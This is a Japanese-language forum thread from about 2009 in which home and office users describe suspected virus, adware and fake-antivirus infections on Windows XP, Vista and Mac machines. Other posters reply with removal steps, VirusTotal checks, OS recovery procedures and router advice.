まだ途中なんですが22個のクッキーと2個のウィルスが検出されています
でも今日ウィルスバスターで検索をかけていたのにこの数は多すぎだと思うのですが
これはウィルスバスターが検出できないようなものもノートンが検出したということでしょうか?
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「なし」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「なし」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「してない」
【ルータの有無】 「有り」
便利ツールインスコしてたりしてて次回立ち上げるとマウスのポインタしか映らなかったり
映ってもしばらくするとブルスク
以前まで出来てたオンラインスキャンも文字なしのエラーが出て???状態なったからOSインスコ
そろそろウィルス対策ソフトいれようかなぁと思ってるけど、今回のはスペック不足?
こういうウィルスってあるんですかね
ウィルスバスターとノートン
2つのアンチウイルスソフトをインストールしてるのかい?
ウィルスバスター2009はソフト買ってきてインストールしたもので
ノートンはいつのまにかPCに入ってました
でもウィルス検出はするけど駆除まではやってないみたい?
どっちかアンインスコしたほうがいいぞ
HIGH、LOW、などといったランク付けされた検出結果みたいな画面とともに、すぐに駆除しないと危険ですとコメントがでます。
OKすると、アンチウィルスPROの購入を勧める画面になって、それらの画面が消せません。
再起動すると、デスクトップ右下のタグの赤い盾みたいな?セキュリティー関連のやつ?が何だか主張していて、
それをクリックすると同じように前述したような画面が出てきます。
何かに感染しているとは思うのですが全くの初心者なので対処が分かりません。
OSはVISTAでセキュリティーソフトは入れていません。
パソコンを買った時に、初期設定してくれた店の人が、VISTAはセキュリティーソフトが内蔵されているので、そういったソフトは入れないで下さいと言われていたので。
長くなってしまいすいません。誰か助けて下さい。
とりあえずリカバリ。
終わったら、近くの家電量販店で「ノートンインターネットセキュリティ」ってのを買ってこい。
>VISTAはセキュリティーソフトが内蔵されているので、そういったソフトは入れないで下さい
Vista付属のははっきり言ってお守りレベル。
コントロールパネルの方から無効にできるから、早々に別のセキュリティソフト導入を勧める。
文字コードがおかしいとかじゃないの
つ別回線
それよりものPCはパスワードつけてないとか、PCつけっぱなしにして学校行くとかしてるんじゃないか?
職場の人に聞いたら、スパイボット?ってのが無料でダウンロード出来るから、
それで駆除してみて、それでもまだおかしいようだったら初期化した方がいいよと言われました。
どっちがいいですかね?
そのスパイボットっていうのを試してみる価値があるなら、まずは試してみようかなと思うのですが。
ほんとにパソコン音痴なもので、初期化するにもサービス業者に委託で頼まないと出来ないから、
出来たら初期化しない方向でいきたいんですけど…。
そのスパイボット使って自分で駆除するのが難しそうなら諦めて初期化します。
Spybotを使うこと自体は簡単ですよ。多分誰でも出来るかと。
というか・・・。こんなとこに書いてる暇があったら、
その前に、自分でやってみたらどうなんですかね?
Spybotだけではとうてい無理。正規のセキュリティソフト入れてないんだろ?
AntiVirusPro - 駆除方法
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2007-100119-4941-99&tabid=3 ↓これだけやってもどうかという所だと思うよ。
ttp://pc11.2ch.net/test/read.cgi/sec/1231490187/146
すいません。全く未知の事なんで、ある程度情報収集してからじゃないと怖くないですか?
パソコンなんて安い物でもないですし…。下手な事はしない方がいいと思って色々聞いてしまいました。
spybotだけでは駄目そうなので、みなさんの言うように初期化しようかと思います。
ありがとうございました。
だから・・・普通の携帯電話は基本的に、Webページを見て感染するウイルスなんて無いよ。
エンコードとかの文字化けか、そうかバイナリファイルでも開いたんだと思うよ?
【Microsoft Update(MU)の状態】 「SP3ではないが他のプログラムは更新済み」
【使用セキュリティソフトとバージョン】 「ESET Smart Security 定義ファイルバージョン3911 」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「SpyBot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「いいえ」
【ルータの有無】 「あり」
【スキャンの結果】 「検出されず」
spybotにて突然レジストリ変更の警告が出ました
「wextract_cleanup0」を変更するかどうかという警告で、調べてみるとウィルスの可能性があるようです
NOD32で検索かけても何も検出しません
ためしに他社のオンラインスキャンをかけてみたのですがそれでも検出なし(カスペOSは何故かDB更新で止まるので不可でした)
警告出現時に閲覧していたサイトは「ふたばちゃんねる」と「FF9攻略」の2つ
実行していたアプリケーションはSleipnirとギコナビのみです
全く身に覚えのない変更な上、怪しいアドレス等を踏んだ覚えもなく焦っています
これは誤検出なのでしょうか?
*ログ
現在のファイル名: rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\WINDOWS\TEMP\IXP000.TMP\"
データベースの状態: 典型的な該当は無し
値: wextract_cleanup0
ファイル名: advpack.dll, DelNodeRunDLL32 [path] [filename].TMP
記述
Wextract Cleanup0 is valid and legal software included or sold to help clean up temporary or cab files created by the installer software for a wide variety of software. It should disapear after a restart of the system. If not fix it
ソース: Paul Collins Startup list
____________________
*ログここまで
閲覧していたページの文字コードが間違ってるだけじゃないの?
文字化けしたら変な漢字が出てくるのは当たり前だし、もしかしたら携帯には非対応のページかもよ。
何でもかんでもウイルスと騒ぐ前に文字化けは文字コードについてググれ。
いい加減うざい
ウィルスバスターの公式サイト携帯でみれば分かるぞ
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「Macはノートン winはマカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「不明」
【スパイウェア対策ソフト】 「多分上記のみ」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「不明」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「不明」
知り合いなのですが、Macの動作がおかしくなったとかで、HDDを物理フォーマットし
OSも入れ直したそうです。
おかしくなる頃に変なメールが来ていたそうですが、おかしくなったMacとは別のMacで
そのメールを開いて見たそうです。
物理フォーマットしOS入れたあともノートンが「ウイルスオフセットパス」を検出したとかで
そのファイルは除去したそうですが、その後ノートンが
インターネットへのFinderアクセスを遮断しました
アプリケーションの遮断 着信
/System/Library/CoreServices/Finder.app/Contets/MacOS/Finder
ユーザー 501
と2回ずつ6分おきに外部着信、と言うそうです。
どうしたらいいかもう毎日トラブルの質問でこっちも参っています
Macなんて触ったこともありません。知り合いは長年Macを使っているくせに何もわかっていません
これはいったい何なのか、どうしたらよいのか、どなたかお助け願います。
その後、エラーの警告文でこう表示される
「不明なソフトウェア例外(0xe0bd7363)がアプリケーション0x7e812a5b」
素人なりにIEごと消そうと、ゴミ箱⇒ディスククリーンしたけどまだ治まらない
知恵を貸してください
OSはXP、ウィルス対策に入れてるノートンでは感知されませんでした
/ ̄ ̄ ̄ / /''7 ./''7 / ̄/ /''7
./ ./ ̄/ / /__/ / / ____  ̄ / /
'ー' _/ / ___ノ / /____/ ___ノ /
/___ノ /____,./ /____,./
_ノ ̄/ / ̄/ /''7 / ̄ ̄ ̄/ / ̄/ /'''7'''7
/ ̄ /  ̄ / /  ̄ フ ./ / ゙ー-; ____ / / /._
 ̄/ / ___ノ / __/ (___ / /ー--'゙ /____/ _ノ /i i/ ./
/__/ /____,./ /___,.ノゝ_/ /_/ /__,/ ゝ、__/
お断りします
お断りします
ハハ ハハ
(゚ω゚)゚ω゚)
/ \ \
((⊂ ) ノ\つノ\つ)
(_⌒ヽ ⌒ヽ
丶 ヘ | ヘ |
εニ三 ノノ Jノ J
言われた通りググって色々調べた結果、問題解決しそうです。有難うございました。それから543と545は私ではありません。念の為に(^_^;)
ファイルとか削除する前に警告がでるの?
ウィルスそれをかいくぐってできることって何があるの?
【使用OS】 『XP sp3』
【使用ブラウザ】 『IE7』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『Norton Internet Security』
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ケーブルでモデムのみ使用』
NORTONでシステムの完全スキャンをしたところ、「Backdoor.Trojanをウイルススキャナが検出しました」
とでました。
で、
状態:削除しました
推奨する処理:解決しました-処理なし
となっています。
これはもう問題は完全に解決したと考えてよいのでしょうか?
クリーンインストールなどは不要でしょうか。
ちなみに
ttp://ime.nu/www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2001-062614-1754-99&tabid=3 の駆除方法に従ってなんらかの作業してみようとしましたが、
「4. レジストリから値を削除する」
の段階で指定されているサブキーが見つかりません。
どなたかご教示いただければ幸いです
マルチはダメ
ttp://pc11.2ch.net/test/read.cgi/sec/1235133157/528
なぜマルチが駄目なのか詳しく理由を
お礼を書けばいいじゃないですか?
マルチポストでぐぐれ
こいつらは利用されてなんぼ
ロダのファイル名********.jpgをクリックしたら、エロサイトにつながって
ノートン先生が反応したのだが、これって何?
【使用OS】 『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: 1.6GHz 、メモリ: 756MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】 『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ADSL』 例、光回線でルータ使用中
『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが
レスしてくれてサンクスです。削除したら問題ないんですね。
アクセス規制にまきこまれてレスできなくて遅くなりました。
Avastインスコ済み
次
ご冥福のAAが貼られるかと期待したのに
これで漏れたやつはいるのかねぇ
失せろカス
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【ルータの有無】 「有り」
Setup.exeが入ったAutorun付きのISOファイルを実行してしまいました。Setup.exeをオンライン検索かけたら
ttp://ime.nu/www.virustotal.com/analisis/948191a9015bfdee7d25a54ebae84440 の結果になったのですが、これはどういったウィルスでしょうか?
Setup.exeをウィルスバスターで検索かけてもウィルスは検出されませんでした。
ttp://changi.2ch.net/test/read.cgi/download/1235461453/976
板違いだから帰れ。
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「avast最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybotとスパイブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
スタートメニューに急に「elo114.exe」というメニューが出現してびっくりしています。
ウィルスかスパイウェアでしょうか?
間違えてダブルクリックしてしまったのですが何も起こりません。
レスありがとうございます。
使いました。
でもエラーが出て使えなかったので削除しました。
もう使わないのであれば右クリックから消せる。
そうなんですね、安心しました。
ありがとうございました。
「rxicjjvn.dll」というdllが感染しているとの警告を受けたのですが
もう一台のxp sp3(PC機)にはこのような名前のdllは存在しません。
bootcamp特有のdllなのか、それともただのウィルスなのか判断できません。
皆さんのwindows\system32にもこのようなファイルがありますか?
削除しても大丈夫なのでしょうか?
GGっても出てこないので質問させて頂きました。
宜しくお願いします。
レス遅れた、すまない。
PC2台所有してるのですね。
macとXPのデュアルブート環境で、「rxicjjvn.dll」というファイルが感染してるんですね。
どうみてもこんなランダムな名前のファイル、通常は存在しない。
ウイルス名は分からないの?
お世話になります。
kaspersky&symantecのonlinescanではtrojan clickerって診断されているのですが
悪意のあるソフトウェアの削除ツール&bitdefenderでは反応なしです。
恐らくウィルスであることは間違いないと思うのですが
削除してしまっても問題ないのかが気になります。
unlocker1.8.7で該dllのwinlogon.exeでの使用(?)は切れたのですが
explorer.exeでの使用(?)を切るとwindows\system32フォルダがフリーズしてしまいます。
590さんの環境下で存在しないdllの様なので、削除しても、os自体が立ち上がらないような
重要なものではなさそうですね。
削除して、少し様子を見てみます。
お気遣い頂き有難う御座いました。
補足しておくと、ファイルのプロパティというのを見れば
正規のファイルか、悪意のあるファイルかは区別が付きます。
【使用OS】 『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: 1.6GHz 、メモリ: 756MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】 『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ADSL』 例、光回線でルータ使用中
『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが
Nortonでは無反応でした。
どっちが正解なのか分からないのですが、調べる方法はありますか?
virustotalに投げてみ。
ttp://ime.nu/www.virustotal.com/jp/ こんな感じで、色んなウイルス対策ソフトで判定してもらえる。
ttp://ime.nu/www.virustotal.com/analisis/0727323358fc1e8d963d8cc7f9c422c6 真性ウイルスだと複数(大抵5個以上)のソフトでウイルス判定される。
自分で判断できなかったら、スレに上記と同じようにアドレスを貼って、他の人にも意見を聞いてみる。
自己判断するしかないのだかvirustotalにファイルを上げてみては。
代理店はキヤノンだっけ?時間がかかるだろうが検体送ればry
さっそくやってみました。
以下の結果がでたのですが、これは黒ってことでしょうか?
ttp://ime.nu/www.virustotal.com/jp/analisis/780660f8f8a2d1bb6ccfaac06798d8fa ttp://ime.nu/www.virustotal.com/jp/analisis/07330a21a32bbf32208b8e8f2bf648a4 これはかなり珍しいパターンだね。メジャー所がみんな取りこぼして(検知していない)、マイナー所が複数検知してる。
このパターンアド誤検出の可能性も残るが、俺はほぼ黒と見ました。
買ったばっかりの物にウイルスが入っていたのなら、念のためUSBカメラのメーカーにメールした方が良いかも。
(NODで検知したことと、virustotalのアドレスを貼り付けてメール)
あと、検出結果のページの日付が少し古いので、既に他の人が一度解析している。
最新の情報が欲しい時は、ファイルを送った後に、『ファイルの再解析』ボタン(右側)を押すと、
最新の解析結果がもらえるので、気になるなら再解析してからメールすると、なお良い。
おっとっと、書き間違い。
× このパターンアド誤検出の可能性も残るが
○ このパターンだと誤検出の可能性も残るが
ttp://ime.nu/antivirus-news.net/2009/03/googlesymantec.html >この事件は、セキュリティベンダーの社会的責任が非常に重いことを意味するものと言えるだろう。
wwwwwwwwwwwwwwwwwwww
>中華にクラックされウイルスを仕込まれた
>
ttp://www.avertlabs.com/research/blog/index.php/2007/10/11/nod-to-more-arp-mayhem/ >(隠蔽しているのでMcAfeeブログより)
>
>公式サイトでウイルス貰えました。
セキュリティベンダーの公式サイトで、
ウイルス配布している所もあったしさ。orz
とりあえず隠しファイル含めた履歴全部消してみたけど・・・
何のウィルスこれ?俺のパソコン大丈夫ですか?
問題ないです。
その曲を指定した時間、又は何か特定の操作をしたら流すマルウェアに感染した
あなたがその曲をプレイヤ−に入れていて、何らかの操作により再生された
あなたの家族や友人が指定した時間、又は何か特定の操作をしたら流すように設定した
せめてテンプレくらい埋めてくれないとなんとも・・・
原田君ですか?
あるかと聞かれれば「ある」。
LANは外部とは一切繋がっておらず、恐らくUSBメモリから感染したと思われます。
USBメモリは決まった物しか使用してはならない決まりですが、個人持ちも使おうと思えば使えます。
が、誰も自分が使ったとは言いません。
OSはWin2000、スキャンソフトはMcAfee、パターンファイルは一部のマシンがまったくアップデートしておらず、
MSから出しているOSの脆弱絡みのパッチは一切適用していない環境です。
パターンファイルが適用されているマシンは、バッファオーバーフローを検知し、怪しげなbatファイルの実行も検知しました。
フルスキャンをかけるとSYSTEM32下の一部EXEがウィルスに感染していました。
パターンファイルが適用されていないマシンは感染ファイルをばらまき、OSの脆弱を利用したアタックを他のマシンにかけていました。
長々と書きましたが、感染源(PC)を特定する良い方法などありますでしょうか?
皆さんのお知恵を貸して下さい。
特定とかより、感染しているPCに入ってる重要なデータを退避させて
クリーンインストールを行なうことを奨めます。
企業では特定するより、被害の拡大を如何に早く食い止め、如何に早く復旧できるかの問題ですからね。
幸い対策はすぐに取れたのでそちらの心配はないのですが
上への報告が必要なので…
幸い俺の所は不況知らずで、最近も20人程外向さんを雇ったんだけど
いつもは面接で顔を見た瞬間駄目だというやつが多かったが
今回はまともな人間がすぐに揃ったよ
・Micorosoft、トレンドマイクロ、シマンテックなどの公式サイトがブラウザで見れない。
このような影響のあるウィルスってありますか?
これってやっぱりウィルスのせいなんでしょうか・・・
試したところ、
・マイクロソフト
・シマンテック
・トレンドマイクロ
は読み込みエラーになってしまいます。
以前は見れていました。他のHPは表示できています。
【Microsoft Update(MU)の状態】 してます
【使用セキュリティソフトとバージョン】 avast最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Widowa Defender
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
スタートアップに services.exe が登録されていました。製造元は不明と表示されています。
コマンドは、C:\Users\******r\AppData\Local\services.exe
(正規のservices.exeはsystem32フォルダにあると聞きました)
タスマネから見ると、ユーザー名がsystemで説明が「サービスとコントローラアプリケーション」と書いてあるservices.exe
ともうひとつ
怪しいと思っている、services.exeがあります。
それが、ユーザー名****** 説明は、「services.exe」です。
2種類ありました。片方は正規?のsystem32関連だと思われるのですが
もうひとつがわかりません。ググるとマルウェア?ウイルス?など
あまり良いことは書いてありませんでしたので、質問にきました。
ttp://ime.nu/www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-011616-5036-99&tabid=2 これだと思いますが、どうでしょう?
617です。情報ありがとう。
でもシマンテックのHPが見れないので、そのアドレスも表示できないんです。
どうすれば。。。(^_^;)
だとしたらリカバリしかない。そういうウィルスだから
とりあえずOS入れ直す方向で考えて見ます。
情報ありがとうです。
>でもシマンテックのHPが見れないので
あ、ごめんね。
えーっとHPより抜粋するに
1. セーフモードで起動して
2. 該当のファイルを削除して
3. 下記のレジストリを消せば大丈夫だと思われます
HKEY_CURRENT_USER¥Software¥Microsoft¥Windows¥CurrentVersion¥Run¥"[ランダムな名前]" = "[トロイの木馬へのパス]"
注意: [ランダムな名前] は、次のリストから得られてます。
CrashDump
EventLog
Init
lsass
Regscan
RunDll
Setup
Sound
svchosts
System
TaskMon
UPNP
Windows
がんばって!
嘘は良くない
ちゃんとレジストリ修復で修復可能
平たく言うと?
リンク切れのことか?
SUPEPAntispywareを使うといいよ。
CCCクリーナーも意外に頑張ってくれるから(完治ではないが多少は緩和する)試してみるといいかも。
パソコン購入時に付いてきたCD-ROM 2枚あるのですが
マイクロソフト オフィス パーソナル エディション 2003
というのはリカバリディスクではないのでしょうか?
ウイルスに感染しているのが確実なようでウイルスのサイトは表示されません。
取説を読むとリカバリディスクは付いていないと書いてあります。
リカバリ手順は調べたのですがディスクは?というところで止まってしまいました。
よろしくお願いいたします。
一枚はワードとかエクセルですね。
もう一枚はその他の付属ソフトかな…?
もしかして冊子なくしたのかな?
とりあえず
1.PCメーカ名
2.使用PCの型番
を書きましょう。
それにリカバリ方法がないのなら
他の冊子に乗っているかと。
付属本は(2〜3)冊あると思うよ。
ありがとうございます。
SONYのVAIO
PCV-W702B/W502B
です。
かなり前、Win95や98の頃リカバリはやったことがあるのですが…今回はXPでさらに感染が確実なようでウイルス対策をしていなかったことを後悔しています。
ttp://dlv.update.sony.net/pub/vaio/download/man/4682290011.pdf "リカバリディスク作成/リカバリ"参照して
取説にリカバリディスクを入れると書いてあるのですが
リカバリディスクの存在が不明!?なのです。
購入時に付いていたものは全部とっておいているはずなのですが
取説によると付属のCDは先の2枚のようで、リカバリディスクは
使用前に自分で作るか有償と書いてあります。
自分では作成しておらず、オンラインのユーザー登録も
していませんでした。昔と違ってリカバリディスクというのは
付属ではないということなのでしょうか?
です
教えて頂きありがとうございます。
携帯から見ようとしたのですが容量が大きく見れないようです。
後でパソコンで見られたら良いのですが全体的に
調子が悪く見られるかわかりません。
また結果をご報告させていただきますね。
遅い時間にありがとうございます。
セキュリティソフトインストール>Office等インストール>Windoes Update
>Dドライブ以降のフルスキャン
"Dドライブ以降のフルスキャン"これ大事。
リカバリディスクの作成方法もリンク先に載っているね。今回は上記の方法で再セットアップ
したあとでリカバリディスクの作成をしておこう。
ありがとうございます。明日にでもレスいただいた手順でやってみたいと思います。
ディスクを作成していないとOSを立ち上げた状態からリカバリするしかないみたいだ。
スタート>すべてのプログラム>VAIOリカバリツール>VAIOリカバリユーティリティ
後は"OK"とか"次"をクリックしていけばOK
絶対にネットにつないではいけないよ。
ttp://ime.nu/www.alpha-net.ne.jp/users2/knight9/m.htm このアドレスは無限回廊って犯罪の有名なデータベースサイトなんだけど、
自分のパソコンじゃ反応しないのに知り合いのパソコンはウィルスに反応したって言われた
これってどうなのか教えて下さい
【使用OS】 winXp
【Microsoft Update(MU)の状態】 自動にしてる
【使用セキュリティソフトとバージョン】 avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
【ルータの有無】 有
どこで反応したかは分かる?
2つあって名前はそれぞれVBS PSYME.CTEとHTML WEBKIT.AIというみたいなんですが
処理状況が「対処できないウイルスに感染したファイルが、感染の拡大を防ぐために隔離されました。」と出ていて
これはつまり完全には駆除してませんよ。という意味で、まだPC内に存在しているということでそゆか
もしそうなら処理方法を教えてほしいです
その手のマルウエアはリアルタイム検索で(サイトを開いたとき)
検出されるのが普通で、windoes update やflash player等の脆弱性がなければ感染しない。
今回検出されたファイルはウイルスそのものなので駆除(正常なファイルに戻す)ことはできない。
隔離されたファイルを削除すればよい。(その後、念のためフルスキャン)
VB2009は使用したことがないので操作手順はわからないが、右下のバスターアイコン(カプセルマーク)から
操作設定画面をたちあげて処理することになる。
昔のバージョンと同じなら隔離されたファイルはこの中にある。
C:\Program Files\Trend Micro\Virus Buster 2009\Quarantine
正規ユーザーなら、本家のヘルプ見てもわからない場合サポートも含めた料金を払っているのだからサポートに聞きなさいよと。
入れる前と比べてかなり重くてアンインスコ
その後何も入れてないんだが何か入れたほうがいいだろうか?
ブラウザはfirefoxでWindows Defenderがある
ごくたまにWindows Live OneCare PC セーフティで(これはIE
スキャンするも毎回感染なし
アンチウイルスの常駐とFWは最低限入れろっても、どうせ重くなるっていいだすだろうしな。
んー、ちょっと分かんないですね…
すいません…
babbあっとxx.しーおー.jpになってたんですがこれってウイルスか何かですか?
アドレスはもちろん全部半角英数だったんですが「xx」ってなってるのが気になって
ググってもわかりませんでした
の手順でセキュリティソフトのインストールまできましたが
続きができません。
リカバリ前に無料のオンラインスキャンもサイトが表示されないので
ウイルスバスター2009を買ってきたのですが、ソフトを入れたら
ウイルスバスター2009インストーラ
セットアッププログラムは、必要なサービスパック
がこのコンピュータのウィンドウズXPに適用されていないことを
検出しました。
【ウィンドウズアップデートの実行】を
クリックして、サービスパックをダウンロードしてください。
と出ています。リカバリ前には、それでもアップデートしようと
しましたが、やはり表示されませんでした。
ウイルスをスキャンや駆除しようとするのを妨害するかのように…。
先程、Cドライブをリカバリ→
(取説の流れで)Office等インストール→ウイルスバスターの
ソフトを入れたら上記のように出ました。
まだネットに繋いではいけないのにアップデートをしなければ
いけないということですよね?
ここでまた止まってしまいました。(泣)
光で1台しかなく困っています。
また教えていただけましたら助かります。
よろしくお願いいたします。
バスターなんか買ってる時点で終わってるけど・・・
ルータが有ればネットに接続しても大丈夫だよ。
一番良いのはnecとかbuffaloの"ブロードバンドルータ"を購入することなのですが…
バンドルされているノートンとかバスターの試用版があると仮定して話をすすめます。
試用版(PFW付が条件)をインストール>windoes update>試用版アンインストール
(通常のアンインストール後、ノートンの場合専用のアンインストーラをシマンテックのサイトから
落として実行)>バスター2009インストール
ノートン・アンインストーラー
ttp://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20050415150354953 本気で言ってるんですか?
ルータ無しでSP2以前のXPや2000でネットに繋いだら数分で終わるぞ。
ネットサーフィンしなくても勝手に入ってくるから。
その後すぐバスター入れてフルスキャンするんだろーがw
もう一回リカバリ作業が必要になりますが、このサイトからSP2インストールCDを入手してください。
ttp://www.microsoft.com/japan/windowsxp/sp2/default.mspx 注文方法はどっちでも構いませんが、お奨めはFAXによる注文ですかね…
CDが届いたらリカバリしてSP2をインストール、バスター2009インストール、WindowsUpdateという手順を踏んではどうですか?
私にレスされても…w
1000円ちょっとですがFAXしたり届くまで時間かかりそうだし…
私なら安物でもよいからルータ買いますね。
うぎゃあ!!
質問者の方と勘違いしてしまいました…
様
ありがとうございます。
ウイルス対策やアップデートもせずにいたことを反省しています。
オンラインで何もできないのなら製品版しかないのかと思いまして
購入しましたが一人では解決できず、またパソコンはそれしかないので
調べることもできません。教えて頂きまして本当に助かります。
プロバイダは感染の可能性を教えてくれるまでですし、
皆さんはバスターなんてと書いておられましたが量販店では
オススメとのこと…。
パソコンメーカーに聞けば?とも言われたりしたのですが
オンラインのユーザー登録もしていなかったので繋げない今は
ここで親切に教えていただけてとても嬉しいです。
ルータは使ったことがないのですが先にあげていただいたのが
オススメなのでしょうか?
光で今後も1台のみ利用の予定です。
よろしくお願いいたします。
私見ですが"お店のお勧め"="良い製品"とは限りません。
"お店のお勧め"="捌きたい製品"のときもあります。
上記はバスターを批判しているわけではありません。すべての商品に対しての私見です。
最近のセキュリティソフトはそれなりにメモリを積んでいないと辛いです。
XPなら最低512Mはほしいですね。
ネットでの製品情報も(個人のブログ含め)さくらの書き込みがないとはいえないことも念頭に入れてください。
その上で価格コムの有線ルーター 満足度ランキング(10000円以下)を5位までかいておきます。
満足度5.00が満点
2004年 7月下旬発売 バッファロー BHR-4RV 最安値:\7,216 満足度4.72 採点人数5人 口コミ件数 347件
2007年 8月下旬発売 IODATA ETX-R 最安値:\2,370 満足度4.12 採点人数17人 口コミ件数 309件
2003年10月下旬発売 バッファロー BBR-4HG 最安値:\4,329 満足度3.58 9人 口コミ件数 3061件
2006年 2月上旬発売 IODATA NP-BBRL 最安値:\2,483 満足度3.27 6人 口コミ件数 774件
2007年 6月下旬発売 COREGA CG-BARFX3 最安値:\2,483 満足度2.43 3人 口コミ件数 73件
丁寧に教えて頂きありがとうございます。
私などは量販店のオススメもパソコンと同時購入で1000円引きなど
これが売りたいんだなと伝わってきてもオススメを買って
しまう無知で いつまでも初心者なのです。
ルータも多分、満足度が高い評価のものを選んでしまうと思います。。。
早速、明日お店に行ってみます。
ttp://www.microsoft.com/japan/windows/products/winfamily/sharedaccess/default.mspx ttp://ime.nu/www.geno-web.jp/ このページは安心ですか?
サービスパック3、バスターでスキャンできました。
リカバリディスク作成はこれからになります。
こちらで親切に教えて頂き本当に助かりました。
これからも質問される方のためにレスしていただけたらと思います。
私も少しずつですが自分でも勉強していこうと思います。
重ね重ねありがとうございました。
直ってよかったね。
PC使えないと情報収集が困難だからね。
数年前のバスターと今月のカスペは「祭り参加者」にならずにすんだけど…
カスペのはPC使用不能まではならないものの…あせるだろうな。
一歩間違えば被害当事者だ。 ベンダーさん、しっかりしてくれ〜
【使用OS】 XP SP2
【Microsoft Update(MU)の状態】 有
【使用セキュリティソフトとバージョン】 ウィルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 常に更新しています
【スパイウェア対策ソフト】 スパイボット clam(非常駐)
【スパイウェア対策ソフトの更新は定期的に行なっているか】 常に更新しています
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
検出されたのはAdware memwatcherというものです
昨日インターネットを高速化しようと思い、InternetAcceleratorSPというフリーソフトをいれました。
するとウィルスバスター2009で検索したところ、スパイウェアは101個検出されました。
未解決の脅威の検出数101、処理数101です。
いつもは検出したらすぐ削除されるのですが、今回は全て隔離になっていました。
これは一体どうすればいいのでしょう?
最悪リカバリも覚悟していますが、InternetAcceleratorSPというフリーソフトというフリーソフト自体削除した方がいいのでしょうか?
窓の社などで紹介されていたので信用していたのですが・・
ちなみにもう一台のパソコンも検出数が全く同じ結果がでました。共通の行為としてはInternetAcceleratorSPというフリーソフトをいれたことだけです。
お分かりの方がいましたらどうか教えてください。お願いします。
あと全ての検出が終わった際、Adware memwatcherというものが1つ表示され削除か復元かを選ぶことになりました。
すぐに削除しましたが、これは解決したということなのでしょうか・・
広告の出るソフト使ってるんじゃないか?
検出名どおり、広告表示のアドウエアだったと思うざます。
トレンドも一応表示してるだけじゃないかな
ttp://ime.nu/www.trendmicro.co.jp/Vinfo/virusencyclo/default5.asp?VName=ADW%5FMEMWATCHER%2EB&VSect=P ダウンローダも同封されてたのかな?
もしかしたらそうかもしれません。ただ広告表示はこれまで出たことがないのでどういうものか分かりませんが・・
これから出るのでしょうか?できればあんまり関わりたくないです。
gooスピードテストなBNP スピードテストなど速度検索をするページへのリンクが機能の中にあるのでこれかもしれません。
製作者は安岡喜晴さんと明示してありますが、ホームページにハングルがあるので韓国製と考えたほうがいいかもしれません。
大陸のものはGOM PLAYERなど使っていたのであんまり抵抗がないかったのですが・・
気になっているのは隔離されました、と出るのに隔離ファイルに先ほど削除したものを除いて何も見当たらないことなんです
そういうものであれば別に問題ないのですが・・
ちなみに隔離ファイル名は全てC:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1です
ttp://ime.nu/www.mcafee.com/japan/security/virA2003.asp?v=Adware-MemWatcher 作者サイトにてInternetAcceleratorSPSetup.msiとものを落としました。
速度測定サイトで紹介されていたので安心していましたが、これ自体がスパイウェアだったのでしょうか?
PCトラブル質問掲示板 へ相談して指示をもらうのがいいと思う
アメリカでもAdware memwatcherの感染例があった
バスタがきっちり処理してたらしい
まあ診てもらっても良いかも
アダ被で同質の感染例・・
悪夢です。ちなみにどこでしょうか?
